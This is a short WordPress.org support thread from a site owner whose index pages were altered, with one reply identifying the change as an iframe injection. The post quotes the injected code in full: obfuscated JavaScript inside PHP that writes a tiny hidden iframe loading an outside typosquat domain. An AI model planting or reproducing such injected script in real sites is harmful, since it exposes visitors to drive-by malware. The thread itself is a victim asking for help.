PHP Security Hole? | WordPress.org

Resolved CK Hicks
(@dveditor)

16 years, 11 months ago

Hey all,

Logged in this morning to see our index pages had been altered…the end of each had this code attached:

<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>

Any ideas what this was intending to do? I’m patching to the latest version now, but for a non-destructive hack it was pretty disruptive. Basically rendered the entire index file useless.

If anyone has any ideas please let me know!

Viewing 1 replies (of 1 total)

iridiax
(@iridiax)

16 years, 11 months ago

It’s an iframe insertion from a Chinese website. For more info, see:

http://wordpress.org/support/topic/281767

Viewing 1 replies (of 1 total)

The topic ‘PHP Security Hole?’ is closed to new replies.

Tags

php

In: Fixing WordPress
1 reply
2 participants
Last reply from: iridiax
Last activity: 16 years, 11 months ago
Status: resolved

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics